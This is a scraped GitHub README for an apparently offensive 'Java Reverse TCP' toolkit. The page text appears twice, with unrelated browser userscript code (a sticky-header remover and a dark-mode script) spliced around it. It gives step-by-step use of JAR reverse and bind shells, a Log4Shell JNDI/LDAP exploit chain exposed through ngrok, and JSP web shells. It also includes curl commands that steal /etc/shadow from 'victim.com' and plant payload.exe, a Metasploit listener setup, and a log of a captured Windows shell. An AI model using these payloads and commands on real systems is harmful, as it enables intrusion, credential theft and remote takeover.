, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Remove or un-stick sticky/fixed headers that block content\n(function() {\n function unstick() {\n document.querySelectorAll('header, nav, [role=\"banner\"], .header, .navbar, .sticky, .fixed-top, [style*=\"position: fixed\"], [style*=\"position:sticky\"]').forEach(function(el) {\n if (el.style.position === 'fixed' || el.style.position === 'sticky' || \n getComputedStyle(el).position === 'fixed' || getComputedStyle(el).position === 'sticky') {\n el.style.position = 'static';\n el.style.top = 'auto';\n el.style.zIndex = 'auto';\n }\n });\n }\n \n unstick();\n \n var observer = new MutationObserver(unstick);\n observer.observe(document.body, { childList: true, subtree: true, attributes: true, attributeFilter: ['style', 'class'] });\n})();", "Kill Sticky Headers"); } } catch(__e) { console.warn('[Userscript:Kill Sticky Headers]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Universal Dark Mode - works on any site\n(function() {\n var enabled = true;\n \n function applyDarkMode() {\n if (!enabled) return;\n \n // Create style element if it doesn't exist\n var style = document.getElementById('universal-dark-mode-style');\n if (!style) {\n style = document.createElement('style');\n style.id = 'universal-dark-mode-style';\n document.head.appendChild(style);\n }\n \n // Dark mode CSS - inverts colors but preserves images/video\n style.textContent = '\n /* Invert everything except media */\n html {\n filter: invert(1) hue-rotate(180deg) !important;\n background: #1a1a2e !important;\n }\n \n /* Restore images, videos, iframes, canvas */\n img, video, iframe, canvas, svg, picture, [style*=\"background-image\"] {\n filter: invert(1) hue-rotate(180deg) !important;\n }\n \n /* Preserve specific elements that should not be inverted */\n .no-dark-mode, .no-dark-mode *,\n [data-theme=\"light\"], [data-theme=\"light\"],\n .ace_editor, .ace_editor *,\n .CodeMirror, .CodeMirror *,\n .monaco-editor, .monaco-editor *,\n .markdown-body pre, .markdown-body pre *,\n .highlight, .highlight *,\n pre code, pre code * {\n filter: none !important;\n }\n \n /* Fix common UI elements */\n .modal, .popup, .dropdown-menu, .tooltip, .popover {\n filter: invert(1) hue-rotate(180deg) !important;\n background: #2d2d44 !important;\n border-color: #444 !important;\n }\n \n /* Scrollbars */\n ::-webkit-scrollbar { background: #1a1a2e !important; }\n ::-webkit-scrollbar-thumb { background: #444 !important; }\n ::-webkit-scrollbar-thumb:hover { background: #555 !important; }\n \n /* Selection */\n ::selection { background: #4ecdc4 !important; color: #1a1a2e !important; }\n ::-moz-selection { background: #4ecdc4 !important; color: #1a1a2e !important; }\n ';\n }\n \n function removeDarkMode() {\n var style = document.getElementById('universal-dark-mode-style');\n if (style) style.remove();\n }\n \n // Toggle with Alt+Shift+D\n document.addEventListener('keydown', function(e) {\n if (e.altKey && e.shiftKey && e.key === 'D') {\n e.preventDefault();\n enabled = !enabled;\n if (enabled) {\n applyDarkMode();\n console.log('[Universal Dark Mode] Enabled');\n } else {\n removeDarkMode();\n console.log('[Universal Dark Mode] Disabled');\n }\n }\n });\n \n // Apply on load\n applyDarkMode();\n \n // Re-apply on dynamic content\n var observer = new MutationObserver(function(mutations) {\n if (enabled && !document.getElementById('universal-dark-mode-style')) {\n applyDarkMode();\n }\n });\n observer.observe(document.head, { childList: true });\n \n console.log('[Universal Dark Mode] Loaded - Press Alt+Shift+D to toggle');\n})();", "Universal Dark Mode"); } } catch(__e) { console.warn('[Userscript:Universal Dark Mode]', __e); } })(); })();
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>